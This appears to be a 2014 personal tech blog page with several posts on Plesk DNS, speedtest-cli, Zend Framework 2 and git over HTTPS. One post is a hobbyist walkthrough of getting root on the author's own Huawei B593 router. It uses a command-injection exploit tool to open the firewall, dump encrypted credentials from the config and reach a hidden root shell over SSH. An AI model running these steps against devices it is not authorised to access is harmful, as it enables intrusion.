Parallels Plesk Panel: Disabling DNS for a domain
Tuesday, January 28. 2014
Parallels has "improved" their support policy: now you need a support contract or pre-purchased incidents just to report a bug. Because my issue is not on my own box (where I have support) but on a customer's server, there is nobody left for me to complain to. So, here goes:
For some reason, on Parallels Plesk Panel 11.5.30 Update #30 (the latest version at the time of writing) a single domain, the same one every time, gets a DNS zone created in /etc/bind.conf. That would be fully understandable if that particular domain had DNS enabled. It doesn't. The web GUI clearly indicates the DNS service for the domain as switched off.
I investigated this and found that a couple of commands will temporarily fix the issue:
/usr/local/psa/bin/dns --off -the-domain-
/usr/local/psa/admin/sbin/dnsmng --remove -the-domain-
The first command hits the DNS with a big hammer to make sure it is turned off. The second command polishes the leftovers out of /etc/bind.conf and properly notifies BIND about the configuration change. The problem is that the zone keeps popping back. I don't know what exactly makes it re-appear, but it has done so a couple of times for me. That is really, really annoying.
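Since the zone keeps reappearing, one workaround is to re-run the cleanup from cron whenever the stray zone shows up again. A minimal sketch, assuming the paths above and using example.com as a stand-in for the affected domain:

```shell
#!/bin/sh
# Re-apply the cleanup if the stray zone has reappeared in the BIND config.
# example.com is a placeholder for the affected domain; the paths are the
# Plesk 11.5 ones mentioned above.
DOMAIN="example.com"
CONF="/etc/bind.conf"

if grep -q "zone \"$DOMAIN\"" "$CONF" 2>/dev/null; then
    /usr/local/psa/bin/dns --off "$DOMAIN"
    /usr/local/psa/admin/sbin/dnsmng --remove "$DOMAIN"
    echo "stray zone for $DOMAIN removed"
else
    echo "no stray zone for $DOMAIN"
fi
```

Dropping something like that into /etc/cron.hourly/ would at least keep the zone gone until Parallels fixes the root cause.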
Parallels: You're welcome. Fix this for the next release, ok?
Rest of you: hopefully this helps. I spent a good while debugging badly misdirected DNS queries just to figure out that the zone had DNS enabled after all.
Linux Integration Services for Hyper-V 3.5: Network status still degraded
Friday, January 24. 2014
Microsoft announced version 3.5 of Linux Integration Services for Hyper-V. An ISO image is available for download at Microsoft's site.
In one of my earlier articles I was wondering if it really matters when Hyper-V indicates the Linux guest status as degraded and tells you that an upgrade is required. This version does not change that. It looks like they just added some (weird) new features and improved the set of virtualization features for Windows Server 2012 R2, but didn't touch the network code. However, there is a promise of TRIM support for 2012 R2.
So, the bottom line is: not worth upgrading.
Speedtest.net from Linux CLI
Monday, January 20. 2014
Speedtest.net has pretty much gained the-place-to-test-your-connection-speed status. It's like Google for web searches: there simply is no real competition available.
Mr. Matt Martz (while throwing hot coals) studied their JavaScript code enough to reimplement their client API in Python.
The installation into the proper directory (recommended: /usr/local/bin/) with proper permissions is this simple:
wget -O speedtest-cli \
    https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
The built-in automatic detection of the nearest server does not work very well for me. The recommended nearest server is not in the country I live in (Finland), but on the Russian side of the border. The network connections over the border aren't that good and simply do not yield reliable measurements. Not to worry, the CLI version can do the following:
speedtest-cli --list | fgrep Finland
864) Nebula Oy (Helsinki, Finland) [204.35 km]
Now that we know the server ID of a proper point, we can do:
speedtest-cli --server 864
It will yield:
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from Finland Oyj (80.80.80.80)...
Hosted by Nebula Oy (Helsinki) [204.35 km]: 14.782 ms
Testing download speed........................................
Download: 92.69 Mbit/s
Testing upload speed..................................................
Upload: 4.32 Mbit/s
Nice!
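For scripting or logging purposes the interesting figures are easy to pick out with awk. A small sketch, run here against a captured sample of the output above (with a live run you would pipe the speedtest-cli output in the same way):

```shell
# Parse the Mbit/s figures out of a speedtest run. The sample file
# mimics the output shown above.
cat > /tmp/speedtest.out <<'EOF'
Hosted by Nebula Oy (Helsinki) [204.35 km]: 14.782 ms
Download: 92.69 Mbit/s
Upload: 4.32 Mbit/s
EOF

awk '/^Download:/ { print "down=" $2 }
     /^Upload:/  { print "up=" $2 }' /tmp/speedtest.out
```

That prints down=92.69 and up=4.32, which is handy for appending to a log file from cron.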
Again, thanks Matt for sharing your work with all of us.
Huawei B593: Logging into shell [Solved!]
Friday, January 17. 2014
I finally cracked this! Just to clarify, I'm running a u-12 model with the Danish 3 firmware.
Using the ping-exploit to loosen firewall rules
The first thing to do is to open the firewall to allow local access to the box. In my article about the DMZ setting I already established that all the good ports are blocked by iptables in the Linux. So, the previously published exploit is needed (I'm doing this on my Linux PC):
./B593cmd.pl -the-IP- -the-admin-Pwd- "iptables -I INPUT -i br0 -j ACCEPT"
Now all ports are open from the LAN, but there are no changes on the Internet side. We can confirm this by running nmap:
Nmap scan report for -the-IP-
Host is up (0.0082s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
443/tcp open https
631/tcp open ipp
8081/tcp open blackice-icecap
MAC Address: F8:3D:FF:F8:3D:FF (Huawei Technologies Co.)
That is something I had been able to do earlier, but I could not get anything concrete out of it.
Confirm that you know the CLI-password
Now that we can run arbitrary commands on the box, let's confirm the configuration:
./B593cmd.pl -the-IP- -the-admin-Pwd- "cat /var/curcfg.xml" | less
The output is a very long XML-file. The good parts are:
<UserInterface>
<X_Web Timeout="5">
<HttpUpg UpdateURL="update-westerneurope.huaweidevice.com" UpdatePort="80"
CheckNewVer="/westerneurope"/>
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="HoHSyzm0ye4="
IsChanged="1"/>
<UserInfoInstance InstanceID="2" Username="user" Userpassword="2n+mVpCOAaY=" IsChanged="0"/>
</UserInfo>
</X_Web>
<X_Cli>
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="f5338SA1kb4=" Userlevel="0"/>
<UserInfoInstance InstanceID="2" Username="user" Userpassword="2n+mVpCOAaY=" Userlevel="1"/>
</UserInfo>
</X_Cli>
</UserInterface>
The output clearly says that the web GUI and the telnet/SSH command line interface have separate user accounts. However, the passwords are encrypted. I have been able to determine that each is a BASE64-encoded string and that the binary data grows in 64-bit blocks. The logical conclusion is that the passwords are encrypted with a symmetric block cipher, but the encryption key, the cipher's mode of operation and the possible initialization vector are currently unknown.
Luckily I know what f5338SA1kb4= and 2n+mVpCOAaY= stand for. They are the default passwords of the box, and the manual says that the default admin password is admin and the default user password is user. Logical, huh? If you don't know the CLI admin password, there is no way you're getting in.
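The 64-bit block observation is easy to verify from the command line: each of the strings in the config dump decodes to exactly 8 bytes, i.e. one block of a 64-bit block cipher. A quick check:

```shell
# Each encrypted password decodes to exactly 8 bytes - one 64-bit block.
for pw in f5338SA1kb4= 2n+mVpCOAaY= HoHSyzm0ye4=; do
    printf '%s -> %s bytes\n' "$pw" \
        "$(printf '%s' "$pw" | base64 -d | wc -c | tr -d ' ')"
done
```

Every one of them comes out at 8 bytes, which fits the symmetric block cipher theory.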
Trying out the SSH
Now, what can we do with the fact that SSH is open and we know the password for the privileged admin user? An SSH login with the correct CLI password yields:
# ssh admin@-the-IP-
admin@-the-IP-'s password:
Write failed: Broken pipe
Not cool. In my exploit-tool article, I referred to Mr. Ronkainen's work at http://blog.asiantuntijakaveri.fi/. He said to execute a specific command via SSH. My next attempt is to follow his instruction:
# ssh admin@-the-IP- /bin/sh
admin@-the-IP-'s password:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>
WHOOO!!
Now the hidden shell-command will work:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>shell
shell
BusyBox vv1.9.1 (2012-11-20 16:01:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
Nice!
SSH with non-privileged user / Telnet
To test this further, I attempted to log in as user user. The non-privileged user does not have the hidden shell command available, and no access is granted:
# ssh user@-the-IP- /bin/sh
user@-the-IP-'s password:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>shell
shell
Command failed.
Trying to access the ATP Cli via telnet does not work either:
# telnet -the-IP-
Trying -the-IP-...
Connected to -the-IP-.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
Login: admin
Password:
Login incorrect. Try again.
I don't know whether telnet is disabled completely or whether there is yet another set of accounts, but neither the web GUI nor the CLI user credentials work there.
Future ventures
Anyway, now that I have shell access I have a much better chance of doing more mischief.
I need to explore the config system more, as it would be very, very nice to have the firewall allow SSH on boot. Currently the only way to allow SSH is to use the exploit and leverage iptables. Also, on public request, I'm going to implement QoS.
Stay tuned for more B593 hacking!
Zend Framework 2: Touching headLink() twice on layout template
Friday, January 17. 2014
This was one of the tricky ones. My CSS inclusion was doubled for a very strange reason. My layout template has:
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
That would be pretty standard for any web application: link a couple of CSS definition files and declare the URL for the website's favorite icon. However, on ZF2, doing things the way my code above does makes things go bad. Rather surprisingly, the HTML gets rendered as:
<link href="/css/jQuery/jquery.mobile.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/style.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/jQuery/jquery.mobile.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/style.css" media="screen" rel="stylesheet" type="text/css">
<link href="/images/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon">
Having the CSS linked twice doesn't actually break anything, but it makes CSS debugging a bit weird. A lot of the declarations appear twice in the list, and the browser has to determine which ones are effective and which ones are ignored in any particular case.
To find out what's going on, I swapped my template to contain:
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
Whatta ... hell!? Now everything works as expected: first the favicon link and then the CSS links, without any unnecessary doubling.
A nice long morning of debugging the ZF2 view code revealed a solution:
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
{$this->headLink()
->deleteContainer()}
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
Now everything renders nicely: no doubles, everything in the order I wanted. The key was to erase Zend\View\Helper\HeadLink's container after doing the stylesheets. The method is actually in the class Zend\View\Helper\Placeholder\Container\AbstractStandalone. Apparently headLink's container only accumulates, and any subsequent call simply adds to the existing storage. The mistake is to print the contents of the container in the middle. The final solution is not to touch headLink() twice:
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])
->prependStylesheet("/css/style.css")
->prependStylesheet("/css/jQuery/jquery.mobile.css")}
Now it works much better! The rendered HTML will have the items in appropriate order:
- /css/jQuery/jquery.mobile.css
- /css/style.css
- /images/favicon.ico
This was yet again one of the funny things that have changed since ZF1. I would definitely consider it a bug, but I don't want to bother sending Zend a report about it. They'll just pull a Microsoft again and declare it a feature.
Zend Framework 2: preDispatch(), returning properly without executing action
Thursday, January 16. 2014
Getting ZF2 to do preDispatch() and postDispatch() like ZF1 had is widely known and documented. In your controller, add this:
protected function attachDefaultListeners()
{
parent::attachDefaultListeners();
$event_mgr = $this->getEventManager();
$event_mgr->attach('dispatch', array($this, 'preDispatch'), 100);
$event_mgr->attach('dispatch', array($this, 'postDispatch'), -100);
}
Two simple listeners are attached with proper priorities to trigger before and after the action.
However, going somewhere else before the action is executed adds some complexity, as one might expect. In preDispatch() you can do one of two suggested things. A redirect:
// Do a HTTP/302 redirect
return $this->redirect()->toRoute(
'application', array('controller' => 'index', 'action' => 'index'
));
My issue here is that it literally does an HTTP/302 redirect in your browser. Another problem is that it still executes the action it was targeted at: it renders the view, runs all the listeners and does all the plugins and helpers, as it started to. It just redirects after all that. I don't want my user to do a redirect, nor do I want to run all the bells and whistles, including the action. Why can't I simply return something else instead, like ZF1 could be programmed to do? At the top of my wish list is executing an action from another controller.
So, the other option is simply to call it quits right in the middle of preDispatch():
$url = $event->getRouter()
->assemble(
array('action' => 'index'),
array('name' => 'frontend')
);
$response = $event->getResponse();
$response->getHeaders()->addHeaderLine('Location', $url);
$response->setStatusCode(302);
$response->sendHeaders();
exit();
That's pretty much the same as the previous one, but uglier. exit()!! Really? In Zend Framework?! I'd rather keep the wheels rolling and the machine turning like it normally would until it has done all the dirty deeds it wants to do. Poking around The Net reveals that nobody is really offering anything else. Apparently everybody is simply copy/pasting from the same sites I found.
This is what I offer: discard the current operation, start a new one and return that! A much better alternative.
Example 1, return JSON-data:
$event->stopPropagation(true);
// Skip executing the action requested. Return this instead.
$result = new JsonModel(array(
'success' => false,
'loginrequired' => true
));
$result->setTerminal(true);
$event->setResponse(new Response());
$event->setViewModel($result);
The key is in the setResponse()-call.
Example 2, call another action:
$event->stopPropagation(true);
// Skip executing the action requested.
// Execute anotherController::errorAction() instead.
$event->setResponse(new Response());
$result = $this->forward()->dispatch('Another', array(
'action' => 'error'
));
$result->setTerminal(true);
$event->setViewModel($result);
Hope this helps somebody else trying to do a ZF1-to-ZF2 transition. In the end, there is only one thing similar between them: both have Zend Framework in their name.
git and HTTPS (fatal: HTTP request failed)
Friday, January 10. 2014
Two facts first about git:
- A number of sites tell you to use git:// or ssh:// instead of https://. Apparently there is some unnecessary complexity when piggy-backing over HTTP Secure.
- I personally don't like git due to its complexity. It's like requiring you to be an experienced mechanic before you can get a driver's license: you can drive a car without exact technical knowledge of its inner workings, but that doesn't seem to be an option with git.
So, I chose to run my own repo on my own box and do it over HTTPS. Since HTTPS is a second-class protocol in the git world, many simple things are unnecessarily difficult.
My initial attempt was to do a simple clone from my existing repo:
git clone https://me@my.server/my/Project
Well, that doesn't end well. There is the fully explanatory fatal: HTTP request failed error. Adding --verbose does not help. Then I found out that git uses curl as its HTTPS transport client, along with a very helpful environment variable for diagnosing the problem:
export GIT_CURL_VERBOSE=1
git clone https://me@my.server/my/Project
That way I got the required debug information about the Certificate Authority certificates being used. It didn't use my own CA's file at all.
The next fix was to tweak the configuration:
git config --global http.sslverify false
It made my clone work! That, however, is not how I do computer security. I need my certificates verified. From the git-config(1) man page I found the required piece of information. Adding the CA root path of my Linux distro makes the entire thing work:
git config --global http.sslverify true
git config --global http.sslCAPath /etc/pki/tls/certs
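If your distribution ships a single CA bundle file instead of a hashed certificate directory, the corresponding knob is http.sslCAInfo. A sketch with the CentOS/RHEL bundle path (adjust for your distro; on Debian/Ubuntu the bundle is /etc/ssl/certs/ca-certificates.crt):

```shell
# Point git at a single CA bundle file instead of a directory.
git config --global http.sslCAInfo /etc/pki/tls/certs/ca-bundle.crt
# Verify the setting took:
git config --global --get http.sslCAInfo
```

Either option keeps certificate verification enabled, unlike the http.sslverify false hammer above.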
Finally I found a good page about all this: http://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewall/4454754 It seems to contain all of this information.
Unfortunately too late! But wouldn't it be great if git emitted a proper error message, like "Peer's certificate issuer is not recognized"? That was the original problem to begin with. Also, why don't the CentOS people configure their curl library to behave like OpenSSL does?